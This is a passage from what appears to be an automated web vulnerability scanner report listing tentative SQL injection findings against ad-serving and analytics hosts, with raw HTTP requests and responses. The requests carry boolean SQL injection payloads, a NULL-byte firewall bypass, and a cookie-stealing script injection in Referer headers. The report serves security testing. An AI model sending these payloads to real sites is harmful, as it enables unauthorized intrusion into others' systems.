6aulkze3o000000023m0215k9lkxlm50000000a3m0316atlkxlm50000000a3m031203lkb5u20000000y3m03163clkxlm50000000a3m031204lkkyy00000000j3m030afqlkze3o000000023m020o0vlkkpqx0000000m3m030z2ilkkxrb0000000k3m0313ovlkxrxz000000043m03'%20and%201%3d1--%20; 
sglst=2280sbpelkxlm50000000a3m030k0a50adsnlkxlm5006bu00a3m030k0a50aarllkxlm5006bu00a3m030k0a50acg5lkxlm5006bu00a3m030k0a50a9rslkkpke0d2dl00s3m030k0b50sam5lkkxr8002zw00l3m030k0b50lcd4lkxlm5006bu00a3m030k0a50acrglkxlm5006bu00a3m030k0a50acnolkxlm5006bu00a3m030k0a50aabelkxlm5006bu00a3m030k0a50add8lkxlm5006bu00a3m030k0a50acy2lkxlm5006bu00a3m030k0a50aaoplkb5u209jqc0063e000j00500cnxlkxlm50000000a3m030k0a50abq3lkxlm5006bu00a3m030k0a50abvplkxlm5006bu00a3m030k0a50aaoilkxlm5006bu00a3m030k0a50a942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm5006bu00a3m030k0a50abvclkxlm5006bu00a3m030k0a50ac5flkxlm5006bu00a3m030k0a50a56blkb5u20mfs300o3l000k00500bjqlkxlm5006bu00a3m030k0a50aawklkxlm5006bu00a3m030k0a50aasulkb5u209jqc0063e000j00500crplkxlm5006bu00a3m030k0a50aasqlkxlm5006bu00a3m030k0a50ac5rlkov6e0000000d3m030k0b50daw8lkxlm5006bu00a3m030k0a50ac60lkxlm5006bu00a3m030k0a50adc4lkxlm5006bu00a3m030k0a50ad26lkxlm5006bu00a3m030k0a50adnjlkxlm5006bu00a3m030k0a50abrilkxlm5006bu00a3m030k0a50acbclkxlm5006bu00a3m030k0a50ac85lkxlm5006bu00a3m030k0a50acsslkxlm5006bu00a3m030k0a50ac80lkb5u209jqc0063e000j00500ag2lkd7nq0m6g700x3m030k0b50uc1elkxlm5006bu00a3m030k0a50ac81lkkpke0cw1r00i3l000k005009grlkxlm5006bu00a3m030k0a50ac8flkxlm5006bu00a3m030k0a50aa6slkkpke0cw1r00i3l000k00500dnalkxlm5006bu00a3m030k0a50a9z6lkxlm50000000a3m030k0a50adbtlkxlm5006bu00a3m030k0a50adyllkxlm5006bu00a3m030k0a50a0kllklhm40c4010053l000k005009q4lkxlm5006bu00a3m030k0a50a9q5lkb5u20mfs300o3l000k00500b3zlkxlm5006bu00a3m030k0a50a0t7ljyxb410gst0153m030k0b50udgflkkpke0d2dl00s3m030k0b50s9mjlkxlm50000000a3m030k0a50abo0lkb5u20mm3x00y3m030k0b50ubo1lkkyy00cmo50093l000k005009pglkxlm5006bu00a3m030k0a50acwalkxlm5006bu00a3m030k0a50ad86lklhm40c4010053l000k00500d84lkxlm5006bu00a3m030k0a50adqllkxlm5006bu00a3m030k0a50adz3lkxlm5006bu00a3m030k0a50acm6lkxlm5006bu00a3m030k0a50acxdlkxlm5006bu00a3m030k0a50a719lkb5u20mm3x00g3m030k0a50b71alkkpke0cw1r00i3l000k00500ctplkxlm5006bu00a3m030k0a50acc3lkxlm5006bu00a3m030k0a50adgilkb5u209jqc0063e000j00500c
thlkxlm5006bu00a3m030k0a50a4wclkb5u20mm3x00g3m030k0a50b8eklkkpke0cw1r00i3l000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm5006bu00a3m030k0a50aarilkxlm50000000a3m030k0a50abwjlkkyy00cszz00j3m030k0b50jcbplkxlm5006bu00a3m030k0a50a9gelkxlm5006bu00a3m030k0a50a; vstcnt=...[SNIP]...

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:35:42 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh15tht0193m040k0c50v; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:35:42 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=...[SNIP]...
...[SNIP]...

Request 2

GET /orbserv/hbjs?pixId=5129&pcv=36 HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4602020164879145|cb=1305033257|adType=iframe|cId=5902|ec=1|spId=30812|advId=1209|exId=21|price=2.133250|pubId=625|secId=414|invId=3715|notifyServer=asd163.sd.pl.pvt|notifyPort=8080|bid=1.75|srcUrlEnc=http%3A%2F%2Fletters.salon.com%2Fpolitics%2Fwar_room%2F2011%2F05%2F09%2Fsantorum_loser%2Fview%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=AC4E503D48FE2CEEC5068B639D61E649; ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1146caxzt1tr37xzt1tr37xzt1146caxzt113zye; adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh15si80183m030k0b50u; rdrlst=...[SNIP]...'%20and%201%3d2--%20; sglst=...[SNIP]...; vstcnt=...[SNIP]...

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:35:43 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh15thu0193m040k0c50v; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:35:43 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=...[SNIP]...
...[SNIP]...

1.11. http://map.media6degrees.com/orbserv/hbpix [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://map.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 83126303'%20or%201%3d1--%20 and 83126303'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /orbserv/hbpix?pixId=2869&curl=http%3A%2F%2Fwww.washingtonpost.com%2F%2Fvendor%2Fsurvey-gizmo.jsp%3FpollURL%3Dhttp%3A%2F%2Fwww.surveygizmo.com%2Fs3%2Fpolljs%26pollID%3D539472-DPU5JRD6BN7QFZ9AI8X6B82W22I59H HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com//vendor/survey-gizmo.jsp?pollURL=http://www.surveygizmo.com/s3/polljs&pollID=539472-DPU5JRD6BN7QFZ9AI8X6B82W22I59H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.2483126303'%20or%201%3d1--%20
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3EE51B53765DEA0EE049F10383DA89D7; ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1146caxzt1tr37xzt1tr37xzt1146caxzt113zye; adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh15si90193m040k0c50v; rdrlst=...[SNIP]...; sglst=...[SNIP]...; vstcnt=417k010r164slly127p10f24exp6103210e24tc6l103210e24ru4y1032107249v4u10pj10e22te10tq10a24tmhw103210924f69z103210f24pq44103210a24n86o103210d24eflo218e104203210724eyja103210e24na8i103210e24mqca103210e24nsyl103210f24jxig103210f24f9wk103210i24fvio218e20e20f203210f24uzpw118e10f24l16a118e10f24fz24103210924e8bw103210824fsuv103210924fduc218e10a203210e24uzdp103210b24dret103210724gqhl103210923sti21hj10a203210e2451gt10pj10e24styu103210924cnyl103210g24o2lt103210a24fj52103210924nnav103210f24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b23l4f103210a24kd6k103210c24hqyp103210i2

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt115tzpxzt1tr37xzt1tr37xzt115tzpxzt113zye; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:46:27 GMT; Path=/
Set-Cookie: adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:46:27 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh15tzp01a3m050k0d50w; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:46:27 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=43n0pahlkze3o000000043m04157rlklhm40000000h3m05144qlkze3o000000043m04157olkxlm50000000c3m0513y7lkze3o000000043m0415sklkkpqq0000000p3m050hsnlkze3o000000043m0412nslkxrxz000000063m050x1blkkpqq0000000p3m050hsplkkpqq0000000p3m0512gdlkkyy00000000l3m050morlkkxrb0000000m3m0514k6lkxlm50000000c3m050w35lkze3o000000043m0413pylkze3o000000043m0414rwlkxlm50000000c3m051628lkze3y000000023m0214khlkxlm50000000c3m051196lkkkbe0000000v3m0513x4lkxrxz000000063m0513qmlkze3y000000023m021195lkkpqh0000000q3m051194lkkjj40000000w3m050dlxlkb5u2000000103m0516nulkxlm50000000c3m051193lkkplo0000000s3m0513q8lkze3y000000023m020p46lkkpqq0000000p3m051192lkkpke0000000u3m05008slklhm40000000h3m0516oilkxlm50000000c3m050moylkl0r50000000i3m050zg4lkze3y000000023m0213qwlkzfle000000013m01144elkze3o000000043m0412ftlkxrxz000000063m0510poljyxb4000000173m050e6llkl0r50000000i3m05138olkxrxz000000063m0516dnlkze3o000000043m04167ulkxq41000000073m0514qllkxlm50000000c3m05159olk8fax000000123m0515halkxlm50000000c3m050m0ulkl0r50000000i3m050m0plkkxrb0000000m3m0516e6lkxnbq0000000b3m0513zblkze3y000000023m0214xnlkxlm50000000c3m05167blkl0r50000000i3m0516dxlkze3o000000043m041391lkxrxz000000063m0515zhlkze3y000000023m021672lkkxrb0000000m3m050ycrlkncow0000000g3m05158mlkze3o000000043m040okclkze3o000000043m041015lkze3y000000023m0213lelkxrxz000000063m0513yolkze3o000000043m04137rlkkpqq0000000p3m050o
...[SNIP]...

Request 2

GET /orbserv/hbpix?pixId=2869&curl=http%3A%2F%2Fwww.washingtonpost.com%2F%2Fvendor%2Fsurvey-gizmo.jsp%3FpollURL%3Dhttp%3A%2F%2Fwww.surveygizmo.com%2Fs3%2Fpolljs%26pollID%3D539472-DPU5JRD6BN7QFZ9AI8X6B82W22I59H HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com//vendor/survey-gizmo.jsp?pollURL=http://www.surveygizmo.com/s3/polljs&pollID=539472-DPU5JRD6BN7QFZ9AI8X6B82W22I59H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.2483126303'%20or%201%3d2--%20
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3EE51B53765DEA0EE049F10383DA89D7; ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1146caxzt1tr37xzt1tr37xzt1146caxzt113zye; adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh15si90193m040k0c50v; rdrlst=...[SNIP]...; sglst=...[SNIP]...; vstcnt=...[SNIP]...

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:46:28 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh15tzr01a3m050k0d50w; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:46:28 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=...[SNIP]...
...[SNIP]...

1.12. http://metrics.philly.com/b/ss/phillycom/1/H.17/s67586282941047 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.philly.com
Path:   /b/ss/phillycom/1/H.17/s67586282941047

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/phillycom%00'/1/H.17/s67586282941047?AQB=1&ndh=1&t=10/4/2011%208%3A11%3A30%202%20300&vmt=498F4D30&ns=phillycom&pageName=article%3A%20news%3A%20Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win%20-%2005/10/2011&g=http%3A//www.philly.com/philly/news/nation_world/121548659.html&cc=USD&ch=news&server=www.philly.com&events=event1%2Cevent4&c1=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&h1=philly%2Cnews%2Cnation_world%2Cindex&v2=article%3A%20news%3A%20Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win%20-%2005/10/2011&h2=philly%2Cphilly%2Cnews%2Cnation_world%2Cindex&c3=Article&v3=news&c4=Inquirer%20Unknown&v4=philly%2Cnews%2Cnation_world%2Cindex&c5=philly%2Cnews%2Cnation_world%2Cindex&v6=First%20Visit&c8=Tuesday&c9=9%3A00AM&c10=Weekday&c11=121548659&v11=www.philly.com&c12=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&v12=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&v13=a&v15=121548659&v16=Article&v17=http%3A//www.philly.com/philly/news/nation_world/121548659.html&v18=logged%20out&c21=First%20Visit&v21=Tuesday&c22=www.philly.com&v22=9%3A00AM&c23=philly%3Anews%3Anation_world&v23=Weekday&c28=New&c29=http%3A//www.philly.com/philly/news/nation_world/121548659.html&c30=logged%20out&c33=flash%2010&c35=silverlight%204.0&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=967&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.philly.com
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_ria=flash%2010%7Csilverlight%204.0; undefined_s=First%20Visit; s_nr=1305033090598

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 10 May 2011 14:20:28 GMT
Server: Omniture DC/2.0.0
Content-Length: 410
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/phillycom was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/phillycom%00''/1/H.17/s67586282941047?AQB=1&ndh=1&t=10/4/2011%208%3A11%3A30%202%20300&vmt=498F4D30&ns=phillycom&pageName=article%3A%20news%3A%20Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win%20-%2005/10/2011&g=http%3A//www.philly.com/philly/news/nation_world/121548659.html&cc=USD&ch=news&server=www.philly.com&events=event1%2Cevent4&c1=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&h1=philly%2Cnews%2Cnation_world%2Cindex&v2=article%3A%20news%3A%20Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win%20-%2005/10/2011&h2=philly%2Cphilly%2Cnews%2Cnation_world%2Cindex&c3=Article&v3=news&c4=Inquirer%20Unknown&v4=philly%2Cnews%2Cnation_world%2Cindex&c5=philly%2Cnews%2Cnation_world%2Cindex&v6=First%20Visit&c8=Tuesday&c9=9%3A00AM&c10=Weekday&c11=121548659&v11=www.philly.com&c12=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&v12=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&v13=a&v15=121548659&v16=Article&v17=http%3A//www.philly.com/philly/news/nation_world/121548659.html&v18=logged%20out&c21=First%20Visit&v21=Tuesday&c22=www.philly.com&v22=9%3A00AM&c23=philly%3Anews%3Anation_world&v23=Weekday&c28=New&c29=http%3A//www.philly.com/philly/news/nation_world/121548659.html&c30=logged%20out&c33=flash%2010&c35=silverlight%204.0&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=967&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.philly.com
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_ria=flash%2010%7Csilverlight%204.0; undefined_s=First%20Visit; s_nr=1305033090598

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 10 May 2011 14:20:28 GMT
Server: Omniture DC/2.0.0
xserver: www622
Content-Length: 0
Content-Type: text/html


1.13. http://q1.checkm8.com/adam/detected [JE parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/detected

Issue detail

The JE parameter appears to be vulnerable to SQL injection attacks. The payloads 20703968%20or%201%3d1--%20 and 20703968%20or%201%3d2--%20 were each submitted in the JE parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=Philly.Home&page=343175042346861&serial=1000:1:A&&LOC=http://www.philly.com/s\qaction=reg\arequested=y\arurl=http\p3A\p2F\p2Fwww.philly.com\p2Fphilly\p2Fnews\p2Fnation_world\p2F121548659.html\p3Fef135\p27\p3Balert\p28document.cookie\p29\p2F\p2F4b169261d24\p3D1&WIDTH=865&HEIGHT=912&WIDTH_RANGE=WR_C&DATE=01110510&HOUR=09&RES=RS21&ORD=1920249378467529&req=fr&&Site_Width=940&~=&OS=WIN7&JE=120703968%20or%201%3d1--%20&UL=en&RES=RS21 HTTP/1.1
Host: q1.checkm8.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: cm8dccp=1305037224

Response 1

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 14:22:56 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: dt=95,20110510142256,OS=WIN7&JE=120703968%20or%201%3d1--%20&UL=en&RES=RS21&CE=1305037224;Path=/;Expires=Sun, 17-Jan-2038 23:27:27 GMT;
Set-cookie: A=d6ZLW3wP1GZRv1R7SOoa;Path=/;
Set-cookie: C=o6ZLW3w4G6NZcaabaW4OH3g;Path=/;Expires=Mon, 24-Sep-2074 17:56:16 GMT;
Set-cookie: O=e6ZLW3wfgMMSgGMBnUOka;Path=/;Expires=Mon, 24-Sep-2074 17:56:16 GMT;
x-internal-browser: FF40
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 151986112/1225783813/388016880/819068785
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 26

...(function(){

})();

Request 2

GET /adam/detected?cat=Philly.Home&page=343175042346861&serial=1000:1:A&&LOC=http://www.philly.com/s\qaction=reg\arequested=y\arurl=http\p3A\p2F\p2Fwww.philly.com\p2Fphilly\p2Fnews\p2Fnation_world\p2F121548659.html\p3Fef135\p27\p3Balert\p28document.cookie\p29\p2F\p2F4b169261d24\p3D1&WIDTH=865&HEIGHT=912&WIDTH_RANGE=WR_C&DATE=01110510&HOUR=09&RES=RS21&ORD=1920249378467529&req=fr&&Site_Width=940&~=&OS=WIN7&JE=120703968%20or%201%3d2--%20&UL=en&RES=RS21 HTTP/1.1
Host: q1.checkm8.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: cm8dccp=1305037224

Response 2

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 14:22:56 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: dt=95,20110510142256,OS=WIN7&JE=120703968%20or%201%3d2--%20&UL=en&RES=RS21&CE=1305037224;Path=/;Expires=Sun, 17-Jan-2038 23:27:27 GMT;
Set-cookie: A=d6ZLW3wJ6HYKwEXQK2Ba;Path=/;
Set-cookie: C=o6ZLW3wmSVMSdaabaZVLWKKc;Path=/;Expires=Mon, 24-Sep-2074 17:56:16 GMT;
x-internal-browser: FF40
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-FROZEN-COOKIES-DETECTION
x-internal-id: 196235096/1270055465/3846566913/1588776318
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 26

...(function(){

})();

1.14. http://q1.checkm8.com/adam/detected [WIDTH parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://q1.checkm8.com
Path:   /adam/detected

Issue detail

The WIDTH parameter appears to be vulnerable to SQL injection attacks. The payloads 45239817%20or%201%3d1--%20 and 45239817%20or%201%3d2--%20 were each submitted in the WIDTH parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=Philly.Home&page=343175042346861&serial=1000:1:A&&LOC=http://www.philly.com/s\qaction=reg\arequested=y\arurl=http\p3A\p2F\p2Fwww.philly.com\p2Fphilly\p2Fnews\p2Fnation_world\p2F121548659.html\p3Fef135\p27\p3Balert\p28document.cookie\p29\p2F\p2F4b169261d24\p3D1&WIDTH=86545239817%20or%201%3d1--%20&HEIGHT=912&WIDTH_RANGE=WR_C&DATE=01110510&HOUR=09&RES=RS21&ORD=1920249378467529&req=fr&&Site_Width=940&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: q1.checkm8.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/s?action=reg&requested=y&rurl=http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html%3Fef135%27%3Balert%28document.cookie%29%2F%2F4b169261d24%3D1
Cookie: cm8dccp=1305037224

Response 1

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 14:22:48 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.14 NY-AD4
